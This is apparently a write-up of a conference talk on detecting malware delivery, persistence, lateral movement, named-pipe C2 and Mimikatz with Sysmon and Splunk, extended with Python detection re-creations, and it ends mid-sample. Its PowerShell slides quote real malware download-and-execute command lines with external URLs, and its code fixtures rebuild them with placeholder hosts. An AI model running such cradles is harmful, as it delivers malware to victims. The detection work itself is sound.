Advanced Incident Detection and Threat Hunting

Tom Ueltschi gives a presentation on using Sysmon and Splunk for advanced incident detection and threat hunting. He outlines how Sysmon provides valuable system activity logs that can be analyzed in Splunk to detect threats. The presentation covers example threat hunting queries and analytics related to malware delivery, persistence methods, lateral movement, and credential access. It also discusses resources like MITRE ATT&CK matrices, the Threat Hunting Project, Sigma rules, and Sysmon projects that can help build effective threat hunting capabilities.


Advanced Incident Detection and Threat Hunting using Sysmon (and Splunk)

Tom Ueltschi, Swiss Post CERT

FIRST 2017 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP-WHITE page 1

C:\> whoami /all

• Tom Ueltschi
• Swiss Post CERT / SOC / CSIRT, since 2007 (10 years!)
  – Focus: Malware Analysis, Threat Intel, Threat Hunting, Red Teaming
• Talks about «Ponmocup Hunter» (Botconf, DeepSec, SANS DFIR Summit)
• BotConf 2016 talk with same title
• Member of many trust groups / infosec communities
• FIRST SIG member (Malware Analysis, Red Teaming)
• Twitter: @c_APT_ure


Outline

• Introduction on Sysmon and public resources
• Brief recap of BotConf talk with examples
• Threat Hunting & Advanced Detection examples
  – Malware Delivery
  – Persistence Methods
  – Internal Recon
  – Lateral Movement
  – Internal Peer-to-Peer C2 using Named Pipes
  – Detecting Mimikatz (even file-less / in-memory)

Standing on the Shoulders of Giants

• It's hard to come up with totally new ideas and approaches
• Know and use what's already available out there
• Share experiences: what works and how


Pyramid of Pain

I want to be able to detect this!


Sqrrl on Threat Hunting

Most examples belong here


MITRE ATT&CK Matrix (Tactics)

• Examples will cover:
  • Persistence (Registry, Filesystem)
  • Discovery / Lateral Movement / Execution (WMI)
  • Command and Control (Named Pipes)
  • Credential Access (Mimikatz)

MITRE ATT&CK Matrix (Techniques)



MITRE ATT&CK Matrix (DGA)


MITRE ATT&CK Matrix (T&T)


MITRE ATT&CK Matrix (ABDC)


MITRE ATT&CK Matrix

Contributions are welcome


MITRE Cyber Analytics Repository



MITRE CARET (Analytics -> T&T Matrix)

Map Analytics to T&T Matrix


MITRE CARET (Analytics -> T&T Matrix)

CAR: Execution of suspicious commands
T&T: Discovery / many


MITRE CARET (Analytics -> T&T Matrix)

CAR: Remote execution via WMI
T&T: Execution / WMI


Threat Hunting Project



ThreatHunter Playbook


Florian Roth’s Sigma Project

Way to go, Neo!


Thomas Patzke’s EQUEL Project


Mike Haag's Sysmon DFIR Github


Why Sysmon? RSA Con Talk M.R.


Why Sysmon? RSA Con Talk M.R.

Time stomping
DLL / Proc Injection



Why Sysmon? RSA Con Talk M.R.

New event types in Sysmon v5 & v6 (not covered in previous talk)



SwiftOnSecurity’s Sysmon configs


Brief Recap of BotConf 2016 Talk


Recap BotConf Talk (1/2)

Using the free Sysmon tool you can search / alert for known malicious process behaviors

• Image names / paths (wrong paths)
  • svchost.exe, %APPDATA%\Oracle\bin\javaw.exe
• CommandLine parameters
  • /stext, vssadmin delete shadows, rundll32 qwerty
• Parent- / Child-Process relationships
  • winword.exe -> explorer.exe, wscript.exe -> rundll32.exe
• Process injection
  • -> winlogon.exe


Recap BotConf Talk (2/2)

Using the free Sysmon tool you can hunt for suspicious process behaviors

• Lateral movement using admin shares -> ADMIN$, C$, IPC$ (\\127.0.0.1\...)
• Internal C&C P2P comms over named pipes / SMB -> processes using port 445 between workstations
• Rarest processes connecting thru proxy (or directly to Internet) -> count by hashes, IMPHASHes, clients, image names
• Suspicious Powershell activity -> Powershell -EncodedCommand | -enc …


Advanced Detection (Adwind RAT)

alert_sysmon_java-malware-infection (JBifrost RAT)

index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode="1"
  (Users AppData Roaming (javaw.exe OR xcopy.exe)) OR (cmd cscript vbs)
| search Image="*\\AppData\\Roaming\\Oracle\\bin\\java*.exe*"
    OR (Image="*\\xcopy.exe*" CommandLine="*\\AppData\\Roaming\\Oracle\\*")
    OR CommandLine="*cscript*Retrive*.vbs*"


Detecting Keyloggers

• Keyloggers and Password-Stealers abusing NirSoft tools
  • Limitless Logger
  • Predator Pain
  • HawkEye Keylogger
  • iSpy Keylogger
  • KeyBase Keylogger

CommandLine: <PATH-TO-EXE>\*.exe /stext <PATH-TO-TXT>\*.txt
CommandLine: <PATH-TO-EXE>\*.exe /scomma ...

index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode="1" ( stext OR scomma )
| search CommandLine="* /stext *" OR CommandLine="* /scomma *"


Detecting Keyloggers

• BONUS: detecting new Banking Trojan variant (Heodo/Emotet)
  • Link in email to download JS from web server (DHL__Report__*.js)
  • Executing JS downloads EXE from web server
  • EXE uses «/scomma» parameter (YARA: NirSoft strings in memory)


Malicious PowerShell

index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode="1" (powershell.exe OR cmd.exe)
| eval CommandLine2=replace(CommandLine,"[ '+\"\^]","")
| search (Image="*\\powershell.exe" OR Image="*\\cmd.exe")
    CommandLine2="*WebClient*" CommandLine2="*DownloadFile*"

CommandLine:
"C:\Windows\System32\cmd.exe" /c powershell -command (("New-Object Net.WebClient")).("'Do' + 'wnloadfile'").invoke( 'http://unofficialhr.top/tv/homecooking/tenderloin.php', 'C:\Users\***\AppData\Local\Temp\spasite.exe'); & "C:\Users\***\AppData\Local\Temp\spasite.exe"

Remove all obfuscation chars (space, single quote, plus, double quote, caret):

CommandLine2:
C:\Windows\System32\cmd.exe/cpowershell-command((New-ObjectNet.WebClient)).(Downloadfile).invoke(http://unofficialhr.top/tv/homecooking/tenderloin.php,C:\Users\purpural\AppData\Local\Temp\spasite.exe);&C:\Users\purpural\AppData\Local\Temp\spasite.exe

• De-obfuscate simple obfuscation techniques

Are all (obfuscation) problems solved?

Malicious PowerShell

CommandLine:
cmd.exe /c powershell -c $eba = ('exe'); $sad = ('wnloa'); (( New-Object Net.WebClient )).( 'Do' + $sad + 'dfile' ).invoke( 'http://golub.histosol.ch/bluewin/mail/inbox.php' 'C:\Users\*****\AppData\Local\Temp\doc.' + $eba); start('C:\Users\*****\AppData\Local\Temp\doc.' + $eba)

«De-obfuscated»:
powershell-c$eba=(exe);$sad=(wnloa);((New-ObjectNet.WebClient)).(Do$saddfile).invoke(http://golub.histosol.ch/bluewin/mail/inbox.phpC:\Users\*****\AppData\Local\Temp\doc.$eba);start(C:\Users\*****\AppData\Local\Temp\doc.$eba)

Query doesn't match «DownloadFile»

LNK with Powershell command – embedded in DOCX file (oleObject.bin)

Sample from 2016-11-18:
d8af6037842458f7789aa6b30d6daefb  Billing # 5616147.docx
2b9c71fe5f121ea8234aca801c3bb0d9  Beleg Nr. 892234-32.lnk

Strings from oleObject.bin:
E:\TEMP\G\18.11.16\ch1\golub\Document no. 892234-32.lnk
C:\Users\ie\AppData\Local\Temp\Beleg Nr. 892234-32.lnk

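Both PowerShell slides above, worked in Python as an added example (this is not code from the talk): normalize_commandline reproduces the slide's replace() eval, is_download_cradle reproduces its search, and resolve_string_variables goes one step further than the deck by inlining single-quoted string variables so that the 'Do' + $sad + 'dfile' sample matches as well. The events, hosts, URLs and paths are constructed placeholders.

```python
import re

# Python equivalent of the slide's Splunk eval
#   replace(CommandLine, "[ '+\"\^]", "")
# i.e. drop spaces, single quotes, plus signs, double quotes and carets.
OBFUSCATION_CHARS = re.compile(r"""[ '+"^]""")

# A simple single-quoted string assignment such as  $sad = ('wnloa')  or  $eba='exe'
VAR_ASSIGNMENT = re.compile(r"\$(\w+)\s*=\s*\(?\s*'([^']*)'\s*\)?")


def normalize_commandline(cmdline: str) -> str:
    """CommandLine2 as computed on the slide: obfuscation characters removed."""
    return OBFUSCATION_CHARS.sub("", cmdline)


def resolve_string_variables(cmdline: str) -> str:
    """One step beyond the slide (my extension, not the talk's query): inline
    single-quoted string variables so that 'Do' + $sad + 'dfile' becomes Downloadfile."""
    variables = dict(VAR_ASSIGNMENT.findall(cmdline))
    normalized = normalize_commandline(cmdline)
    # Longest names first so that $sad does not clobber a hypothetical $sadder.
    for name in sorted(variables, key=len, reverse=True):
        normalized = normalized.replace("$" + name, variables[name])
    return normalized


def is_download_cradle(event: dict, resolve_vars: bool = False) -> bool:
    """Mirror of the slide's search: powershell.exe or cmd.exe whose normalized
    command line contains both WebClient and DownloadFile. Splunk wildcard
    matching is case-insensitive, so the comparison is done in lower case."""
    image = event.get("Image", "").lower()
    if not (image.endswith("\\powershell.exe") or image.endswith("\\cmd.exe")):
        return False
    cmd = event.get("CommandLine", "")
    cmd2 = resolve_string_variables(cmd) if resolve_vars else normalize_commandline(cmd)
    cmd2 = cmd2.lower()
    return "webclient" in cmd2 and "downloadfile" in cmd2


# Constructed EventCode 1 records modelled on the two slides; hosts, URLs and
# user names are placeholders, not the values from the talk.
SPLIT_STRING_EVENT = {
    "Image": r"C:\Windows\System32\cmd.exe",
    "CommandLine": r'''"C:\Windows\System32\cmd.exe" /c powershell -command (("New-Object Net.WebClient")).("'Do' + 'wnloadfile'").invoke( 'http://example.invalid/tv/page.php', 'C:\Users\user\AppData\Local\Temp\spasite.exe'); & "C:\Users\user\AppData\Local\Temp\spasite.exe"''',
}
VARIABLE_EVENT = {
    "Image": r"C:\Windows\System32\cmd.exe",
    "CommandLine": r'''cmd.exe /c powershell -c $eba = ('exe'); $sad = ('wnloa'); (( New-Object Net.WebClient )).( 'Do' + $sad + 'dfile' ).invoke( 'http://example.invalid/mail/inbox.php', 'C:\Users\user\AppData\Local\Temp\doc.' + $eba); start('C:\Users\user\AppData\Local\Temp\doc.' + $eba)''',
}
BENIGN_EVENT = {
    "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "CommandLine": r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users\user\Documents",
}

if __name__ == "__main__":
    for label, ev in (("split strings", SPLIT_STRING_EVENT), ("variables", VARIABLE_EVENT),
                      ("benign", BENIGN_EVENT)):
        print(f"{label:14} slide query: {is_download_cradle(ev)!s:5}  "
              f"with variable resolution: {is_download_cradle(ev, resolve_vars=True)}")
```

The variable-resolution step is a heuristic for the one trick the second slide shows; string reversal, format operators or encoded commands still need their own handling.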

Processes connecting thru Proxy

index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode=1
  [ search index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode=3
      Image="*\\Users\\*" DestinationHostname="proxy.fqdn"
    | stats by ComputerName ProcessGuid
    | fields ComputerName ProcessGuid ]
| fields Hashes ComputerName Image ParentImage
| rex field=Hashes ".*MD5=(?<MD5>[A-F0-9]*),IMPHASH=(?<IMPHASH>[A-F0-9]*)"
| rex field=Image ".*\\\\Users\\\\(?<username>[^\\\\]+)\\\\.*"
| rex field=Image ".*\\\\+(?<proc_name>[^\\\\]+\.[eE][xX][eE]).*"
| rex field=ParentImage ".*\\\\+(?<pproc_name>[^\\\\]+\.[eE][xX][eE]).*"
| stats dc(ComputerName) AS CLIENTS, dc(MD5) AS CNT_MD5, dc(Image) AS CNT_IMAGE,
    values(username) AS Users, values(ComputerName) AS Computers, values(MD5) AS MD5,
    values(proc_name) AS proc_name, values(pproc_name) AS pproc_name
    by IMPHASH
| where CLIENTS < 15
| sort -CLIENTS

• IMPHASH = Import Hash


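The two-stage proxy search above, re-created in Python as an added example (not the talk's own code): the subsearch becomes a set of (ComputerName, ProcessGuid) pairs, the outer stats become a per-IMPHASH aggregation with the same CLIENTS < 15 filter. proxy.example.invalid stands in for the slide's proxy.fqdn, the events are constructed, and parse_hashes goes slightly beyond the slide's rex by accepting SHA256 between MD5 and IMPHASH.

```python
import re
from collections import defaultdict


def parse_hashes(hashes: str) -> dict:
    """Split Sysmon's Hashes field (e.g. 'MD5=...,SHA256=...,IMPHASH=...') into a dict.
    The slide's rex assumes MD5 is immediately followed by IMPHASH; this parser
    accepts any order, so it also works when SHA256 is configured in between."""
    out = {}
    for part in hashes.split(","):
        if "=" in part:
            key, value = part.split("=", 1)
            out[key.strip().upper()] = value.strip().upper()
    return out


def basename(path: str) -> str:
    """Last path component, like the slide's proc_name / pproc_name rex."""
    return path.rsplit("\\", 1)[-1]


def user_from_image(image: str):
    """User name from a path under \\Users\\<name>\\, like the slide's username rex."""
    m = re.search(r"\\Users\\([^\\]+)\\", image, re.IGNORECASE)
    return m.group(1) if m else None


def rare_proxy_processes(events, proxy_fqdn: str, max_clients: int = 15) -> list:
    """Stage 1 (the subsearch): EventCode 3 connections to the proxy from an image
    under \\Users\\ give a set of (ComputerName, ProcessGuid).
    Stage 2: EventCode 1 process creations with those GUIDs are aggregated by
    IMPHASH; IMPHASHes seen on fewer than max_clients hosts are returned."""
    proxy_guids = {
        (e["ComputerName"], e["ProcessGuid"])
        for e in events
        if e["EventCode"] == 3
        and e.get("DestinationHostname", "").lower() == proxy_fqdn.lower()
        and "\\users\\" in e.get("Image", "").lower()
    }
    groups = defaultdict(lambda: defaultdict(set))
    for e in events:
        if e["EventCode"] != 1 or (e["ComputerName"], e["ProcessGuid"]) not in proxy_guids:
            continue
        hashes = parse_hashes(e["Hashes"])
        if "IMPHASH" not in hashes:
            continue
        g = groups[hashes["IMPHASH"]]
        g["Computers"].add(e["ComputerName"])
        g["MD5"].add(hashes.get("MD5", ""))
        g["Images"].add(e["Image"])
        g["Users"].add(user_from_image(e["Image"]) or "")
        g["proc_name"].add(basename(e["Image"]))
        g["pproc_name"].add(basename(e["ParentImage"]))
    rows = []
    for imphash, g in groups.items():
        clients = len(g["Computers"])          # dc(ComputerName) AS CLIENTS
        if clients < max_clients:              # where CLIENTS < 15
            rows.append({
                "IMPHASH": imphash, "CLIENTS": clients,
                "CNT_MD5": len(g["MD5"]), "CNT_IMAGE": len(g["Images"]),
                "Users": sorted(g["Users"]), "Computers": sorted(g["Computers"]),
                "MD5": sorted(g["MD5"]), "proc_name": sorted(g["proc_name"]),
                "pproc_name": sorted(g["pproc_name"]),
            })
    return sorted(rows, key=lambda r: -r["CLIENTS"])   # sort -CLIENTS


def _proc(host, guid, image, parent, md5, imphash):
    return {"EventCode": 1, "ComputerName": host, "ProcessGuid": guid, "Image": image,
            "ParentImage": parent, "Hashes": f"MD5={md5},SHA256={'0' * 64},IMPHASH={imphash}"}


def _conn(host, guid, image, dest):
    return {"EventCode": 3, "ComputerName": host, "ProcessGuid": guid, "Image": image,
            "DestinationHostname": dest}


# Constructed sample events; hosts, GUIDs, hashes and paths are placeholders.
PROXY = "proxy.example.invalid"
SAMPLE_EVENTS = []
# 20 workstations running the same widely deployed updater from a user profile.
for i in range(20):
    host, guid = f"WS{i:03d}", f"{{guid-updater-{i}}}"
    image = rf"C:\Users\user{i}\AppData\Local\Updater\updater.exe"
    SAMPLE_EVENTS += [_proc(host, guid, image, r"C:\Windows\explorer.exe", "11" * 16, "C0FFEE0001"),
                      _conn(host, guid, image, PROXY)]
# Two hosts running a repacked dropper: different MD5s, one IMPHASH (the slide's point).
for i, md5 in ((1, "aa" * 16), (7, "bb" * 16)):
    host, guid = f"WS{i:03d}", f"{{guid-dropper-{i}}}"
    image = rf"C:\Users\user{i}\AppData\Local\Temp\spasite.exe"
    SAMPLE_EVENTS += [_proc(host, guid, image, r"C:\Windows\System32\cmd.exe", md5, "DEADBEEF02"),
                      _conn(host, guid, image, PROXY)]
# A browser under Program Files also uses the proxy but lies outside \Users\ and so outside the subsearch.
SAMPLE_EVENTS += [_proc("WS003", "{guid-browser}", r"C:\Program Files\Browser\browser.exe",
                        r"C:\Windows\explorer.exe", "cc" * 16, "BADC0DE003"),
                  _conn("WS003", "{guid-browser}", r"C:\Program Files\Browser\browser.exe", PROXY)]

if __name__ == "__main__":
    for row in rare_proxy_processes(SAMPLE_EVENTS, PROXY):
        print(row)
```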

SMB traffic between WS

index=sysmon SourceName="Microsoft-Windows-Sysmon" EventCode=3
  Initiated=true SourceIp!=DestinationIp DestinationPort=445 Image!=System
  (SourceHostname="WS*" DestinationHostname="WS*") OR (SourceIp="10.10.*.*" DestinationIp="10.10.*.*")
| stats by ComputerName ProcessGuid
| fields ComputerName ProcessGuid

• Search for network connections
  • SMB protocol (dst port 445)
  • Source and destination are workstations (hostname or IP)
  • Use «ProcessGuid» to correlate with other event types (proc's)
  • Search for legitimate SMB servers (filers, NAS)
  • Create «whitelist» to exclude as legit dest


Lateral Movement (admin shares)

CS_Lateral_Movement_psexec

Process tree: C:\Windows\system32\services.exe -> \\127.0.0.1\ADMIN$\8c0cb58.exe

10/18/2016 11:17:12 PM
LogName=Microsoft-Windows-Sysmon/Operational
SourceName=Microsoft-Windows-Sysmon
EventCode=1
EventType=4
Type=Information
...
Message=Process Create:
Image: \\127.0.0.1\ADMIN$\8c0cb58.exe
CommandLine: \\127.0.0.1\ADMIN$\8c0cb58.exe
CurrentDirectory: C:\Windows\system32\
User: NT AUTHORITY\SYSTEM
IntegrityLevel: System
ParentImage: C:\Windows\system32\services.exe
ParentCommandLine: C:\Windows\System32\services.exe

• Search for admin share names in image paths


Lateral Movement (admin shares)

CS_Lateral_Movement_psexec

Process tree: C:\Windows\system32\services.exe -> \\127.0.0.1\ADMIN$\8c0cb58.exe -> C:\Windows\system32\rundll32.exe

10/18/2016 11:17:13 PM
LogName=Microsoft-Windows-Sysmon/Operational
SourceName=Microsoft-Windows-Sysmon
EventCode=1
EventType=4
Type=Information
...
Message=Process Create:
Image: C:\Windows\SysWOW64\rundll32.exe
CommandLine: C:\Windows\System32\rundll32.exe
CurrentDirectory: C:\Windows\system32\
User: NT AUTHORITY\SYSTEM
IntegrityLevel: System
ParentImage: \\127.0.0.1\ADMIN$\8c0cb58.exe
ParentCommandLine: \\127.0.0.1\ADMIN$\8c0cb58.exe

• Search for admin share names in image paths


Lateral Movement (proc injection)

CS_Lateral_Movement_psexec

Injection: \\127.0.0.1\ADMIN$\8c0cb58.exe -> C:\Windows\system32\rundll32.exe

10/18/2016 11:17:13 PM
LogName=Microsoft-Windows-Sysmon/Operational
SourceName=Microsoft-Windows-Sysmon
EventCode=8
EventType=4
Type=Information
...
Message=CreateRemoteThread detected:
SourceProcessId: 29340
SourceImage: \\127.0.0.1\ADMIN$\8c0cb58.exe
TargetProcessId: 18476
TargetImage: C:\Windows\SysWOW64\rundll32.exe
NewThreadId: 20060
StartAddress: 0x0000000000110000
StartFunction:

• Search for rarest source or target images from proc injection


Keylogger (proc injection)

CS_Keylogger_injection

Injection: C:\Windows\SysWOW64\rundll32.exe -> C:\Windows\system32\winlogon.exe

10/26/2016 11:56:32 PM
LogName=Microsoft-Windows-Sysmon/Operational
SourceName=Microsoft-Windows-Sysmon
EventCode=8
EventType=4
Type=Information
...
Message=CreateRemoteThread detected:
SourceProcessId: 17728
SourceImage: C:\Windows\SysWOW64\rundll32.exe
TargetProcessId: 836
TargetImage: C:\Windows\System32\winlogon.exe
NewThreadId: 14236
StartAddress: 0x0000000000C20000
StartFunction:

• Suspicious proc injection into «winlogon.exe» -> steal user's password while logging on or unlocking screensaver

Hunting for Delivery of Malware

• Malicious files downloaded via Browser
• Sysmon «FileCreateStreamHash» events generated
• Remember the malicious JS files from email links? (Heodo/Emotet)


Hunting for Delivery of Malware

• Remember that JS Filename from before?
• Let's hunt for that… (DHL__Report__*.js)



Detecting Persistence Methods

• Hunting for Persistence Methods
  – Registry Keys
  – Filesystem (e.g. Startup folders)


Detecting Persistence (Registry)

• Searching for «Run» or «RunOnce» keys



Detecting Persistence (Filesystem)

• Example for «ProcessCreate», not «FileCreate»


Detecting Persistence (Filesystem)

This should make you go «Hmmm??»


Detecting Persistence (Filesystem)

• Example for «FileCreate»
• Less than 400 results in > 2 months
  • after tuning exclusion list



Detecting Internal Recon

• Internal Recon used as preparation for Lateral Movement
• Legit system commands used
• Can also be used by sysadmins or users
• Baseline and find appropriate thresholds
  – Number of different commands and time window



Detecting Internal Recon

• 3 or more (of 7) different commands executed within 15 min


Detecting Internal Recon

15 occurrences, 6 different commands within 15 mins

Detecting Internal Recon

«False detections» are possible: Explorer -> cmd.exe, 3 different commands within 3 mins

Lateral Movement

• Lateral Movement using WMI for Execution


ATT&CK TTP on WMI


Who’s (ab-)using WMI





Testing with WMImplant

• Testing «command_exec» using WMImplant with PS-ISE


Testing with WMImplant

• Testing «process_start» using WMImplant with Beacon


Detecting WMI spawned proc’s





Detecting WMI spawned proc's

• Searching for Child-Process creations of «wmiprvse.exe»
• Filtering out «known good» processes
  • Don't filter out «Powershell.exe» in general
  • Combine with «CommandLine» params

Detecting WMI spawned proc's

• Command executions («powershell *$env:*» and IEX, obfusc.)
• Processes started (calc.exe, notepad.exe …)


Detecting WMI spawned proc's

• Also detecting CS Beacon's WMI Lateral Movement method -> «powershell.exe … -encodedcommand …»


Internal P2P C2 using Named Pipes

• Internal Peer-to-Peer C&C using Named Pipes over SMB
• Using Cobalt Strike Beacon's features for testing


Cobalt Strike Features

Only one egress point using HTTP as C&C (conn thru web proxy)
SMB traffic between WS: Named Pipes C&C


Detecting C2 using Named Pipes

• Search for Processes
  • Connecting through Web Proxy and
  • Creating Named Pipes



Detecting C2 using Named Pipes

• Search for Processes creating «known malicious» Named Pipes
  • with or without «default PipeNames»


Detecting C2 using Named Pipes

• Searching for «custom PipeNames» only


Detecting C2 using Named Pipes

• Searching for «default & custom PipeNames»

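The named-pipe C2 hunt described in this section (processes that connect through the web proxy and create a named pipe) combined with the earlier "SMB traffic between WS" search, as an added Python example that is not code from the talk. Both searches are joined on (ComputerName, ProcessGuid) as the slides suggest; Sysmon EventCode 17 is the PipeCreated event. The proxy name, pipe names, allowlists, GUIDs and addresses are constructed placeholders that would have to be tuned per environment.

```python
from collections import defaultdict


def pipe_creating_proxy_processes(events, proxy_fqdn: str, pipe_allowlist=frozenset()) -> list:
    """Join EventCode 3 (network connection to the web proxy) with EventCode 17
    (PipeCreated) on (ComputerName, ProcessGuid). A process that both talks to
    the proxy and creates a named pipe is a candidate egress beacon of an
    internal peer-to-peer C2 chain. pipe_allowlist holds lower-cased pipe names
    of known-good software (an assumption: it has to be tuned per environment)."""
    proxy_image = {}
    pipes = defaultdict(set)
    for e in events:
        key = (e["ComputerName"], e["ProcessGuid"])
        if e["EventCode"] == 3 and e.get("DestinationHostname", "").lower() == proxy_fqdn.lower():
            proxy_image[key] = e["Image"]
        elif e["EventCode"] == 17 and e["PipeName"].lower() not in pipe_allowlist:
            pipes[key].add(e["PipeName"])
    hits = [{"ComputerName": key[0], "ProcessGuid": key[1], "Image": proxy_image[key],
             "PipeNames": sorted(names)} for key, names in pipes.items() if key in proxy_image]
    return sorted(hits, key=lambda h: (h["ComputerName"], h["ProcessGuid"]))


def workstation_smb_connections(events, server_allowlist=frozenset()) -> list:
    """The earlier slide's SMB search: EventCode 3, Initiated=true, destination
    port 445, SourceIp != DestinationIp, Image != System, both ends workstations
    (hostname WS* or both in 10.10.0.0/16); destinations on the allowlist of
    legitimate SMB servers (filers, NAS) are dropped."""
    rows = []
    for e in events:
        if e["EventCode"] != 3 or not e.get("Initiated") or e.get("DestinationPort") != 445:
            continue
        if e["SourceIp"] == e["DestinationIp"] or e["Image"] == "System":
            continue
        src, dst = e["SourceHostname"].upper(), e["DestinationHostname"].upper()
        ws_by_name = src.startswith("WS") and dst.startswith("WS")
        ws_by_ip = e["SourceIp"].startswith("10.10.") and e["DestinationIp"].startswith("10.10.")
        if (ws_by_name or ws_by_ip) and dst not in server_allowlist:
            rows.append((src, dst, e["Image"], e["ProcessGuid"]))
    return rows


def p2p_c2_candidates(events, proxy_fqdn, pipe_allowlist=frozenset(), server_allowlist=frozenset()) -> list:
    """Combine both searches: for each pipe-creating proxy process, list the
    workstations that opened SMB connections to its host, i.e. the inbound
    peers of a Beacon-style named-pipe C2 chain."""
    smb = workstation_smb_connections(events, server_allowlist)
    candidates = []
    for hit in pipe_creating_proxy_processes(events, proxy_fqdn, pipe_allowlist):
        peers = sorted({src for src, dst, _, _ in smb if dst == hit["ComputerName"].upper()})
        candidates.append({**hit, "SmbPeers": peers})
    return candidates


def _net(host, guid, image, dst_host, dst_port, src_ip, dst_ip):
    return {"EventCode": 3, "ComputerName": host, "ProcessGuid": guid, "Image": image,
            "Initiated": True, "SourceHostname": host, "SourceIp": src_ip,
            "DestinationHostname": dst_host, "DestinationIp": dst_ip, "DestinationPort": dst_port}


def _pipe(host, guid, image, name):
    return {"EventCode": 17, "ComputerName": host, "ProcessGuid": guid, "Image": image, "PipeName": name}


# Constructed sample events; proxy name, pipe names, GUIDs and addresses are placeholders.
PROXY = "proxy.example.invalid"
RUNDLL = r"C:\Windows\SysWOW64\rundll32.exe"
SAMPLE_EVENTS = [
    # WS001: the egress beacon talks to the proxy and hosts a pipe for its peers
    _net("WS001", "{g1}", RUNDLL, PROXY, 8080, "10.10.1.1", "10.10.0.10"),
    _pipe("WS001", "{g1}", RUNDLL, r"\constructed_pipe_7a3f"),
    # WS001: the browser uses the proxy too, but never creates a pipe
    _net("WS001", "{g2}", r"C:\Program Files\Browser\browser.exe", PROXY, 8080, "10.10.1.1", "10.10.0.10"),
    # WS002: a peer beacon reaching WS001 over SMB
    _net("WS002", "{g3}", RUNDLL, "WS001", 445, "10.10.1.2", "10.10.1.1"),
    # WS003: a user mapping a share on the file server, and kernel SMB traffic to WS001
    _net("WS003", "{g4}", r"C:\Windows\explorer.exe", "FILER01", 445, "10.10.1.3", "10.10.0.5"),
    _net("WS003", "{g5}", "System", "WS001", 445, "10.10.1.3", "10.10.1.1"),
    # WS004: the print spooler creates a pipe but has no proxy connection
    _pipe("WS004", "{g6}", r"C:\Windows\System32\spoolsv.exe", r"\spoolss"),
    # WS005: a known-good application that uses the proxy and an allowlisted pipe
    _net("WS005", "{g7}", r"C:\Program Files\LegitApp\legitapp.exe", PROXY, 8080, "10.10.1.5", "10.10.0.10"),
    _pipe("WS005", "{g7}", r"C:\Program Files\LegitApp\legitapp.exe", r"\legitapp_pipe"),
]

if __name__ == "__main__":
    for c in p2p_c2_candidates(SAMPLE_EVENTS, PROXY, {"\\legitapp_pipe"}, {"FILER01"}):
        print(c)
```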


Detecting Mimikatz (even file-less)

• Detecting ProcessAccess on LSASS.exe
• Idea by Mark Russinovich (RSA talk)



Detecting Mimikatz

• Search for ProcessAccess of LSASS.exe
  • GrantedAccess of: 0x1010, 0x1410, 0x143A
  • CallTrace: KERNELBASE.dll and (ntdll.dll or UNKNOWN)


Detecting Mimikatz

• Mimikatz executable from Github
• File-based -> No «UNKNOWN» from shellcode / injection


Detecting Mimikatz

• Cobalt Strike Beacon's built-in Mimikatz «logonpasswords»
• File-less -> «UNKNOWN» from shellcode / injection


Detecting Mimikatz

• Invoke-Mimikatz using PowerPick from Cobalt Strike's Beacon
• File-less -> «UNKNOWN» from shellcode / injection


Detecting Mimikatz

• Don't search for specific SourceImage names
  • e.g. Rundll32.exe -- it could be really anything! (even cmd.exe)

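The LSASS ProcessAccess rule from the Mimikatz slides (GrantedAccess 0x1010 / 0x1410 / 0x143A, CallTrace with KERNELBASE.dll and ntdll.dll or UNKNOWN, no filter on SourceImage) written out in Python as an added example; it is not code from the talk. It assumes Splunk shows the EventCode 10 message as "Key: value" lines, and the five sample messages, their offsets and paths are constructed.

```python
SUSPICIOUS_ACCESS = {0x1010, 0x1410, 0x143A}


def parse_process_access(message: str) -> dict:
    """Turn the 'Key: value' lines of a Sysmon EventCode 10 (ProcessAccess)
    message, as Splunk displays them, into a dict."""
    fields = {}
    for line in message.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def is_lsass_credential_access(fields: dict) -> bool:
    """The slide's criteria: TargetImage is lsass.exe, GrantedAccess is 0x1010,
    0x1410 or 0x143A, CallTrace contains KERNELBASE.dll and (ntdll.dll or
    UNKNOWN). SourceImage is deliberately not tested: it may be rundll32.exe,
    cmd.exe or anything else."""
    if not fields.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return False
    try:
        granted = int(fields.get("GrantedAccess", "0"), 16)
    except ValueError:
        return False
    if granted not in SUSPICIOUS_ACCESS:
        return False
    trace = fields.get("CallTrace", "").lower()
    return "kernelbase.dll" in trace and ("ntdll.dll" in trace or "unknown" in trace)


def hunt(messages) -> list:
    """(SourceImage, GrantedAccess, file-less) for every message that trips the
    rule; file-less means the CallTrace has an UNKNOWN frame, i.e. code that is
    not backed by a file on disk (shellcode / injection)."""
    hits = []
    for message in messages:
        fields = parse_process_access(message)
        if is_lsass_credential_access(fields):
            hits.append((fields["SourceImage"], fields["GrantedAccess"], "UNKNOWN" in fields["CallTrace"]))
    return hits


# Constructed EventCode 10 messages modelled on the slides' cases; offsets and paths are placeholders.
SAMPLES = [
    # Mimikatz executable from GitHub run from disk: file-based, no UNKNOWN frame
    r"""Process accessed:
SourceImage: C:\Users\user\Downloads\mimikatz.exe
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1010
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a5a4|C:\Windows\system32\KERNELBASE.dll+f61|C:\Users\user\Downloads\mimikatz.exe+3c41a""",
    # Beacon's built-in logonpasswords running in an injected rundll32.exe: file-less
    r"""Process accessed:
SourceImage: C:\Windows\SysWOW64\rundll32.exe
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1010
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a5a4|C:\Windows\system32\KERNELBASE.dll+f61|UNKNOWN(0000000002C70B4C)""",
    # Same technique from an unexpected source image
    r"""Process accessed:
SourceImage: C:\Windows\System32\cmd.exe
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x143A
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a5a4|C:\Windows\system32\KERNELBASE.dll+f61|UNKNOWN(00000000031A0F11)""",
    # Task Manager asking for limited information: benign access mask
    r"""Process accessed:
SourceImage: C:\Windows\system32\taskmgr.exe
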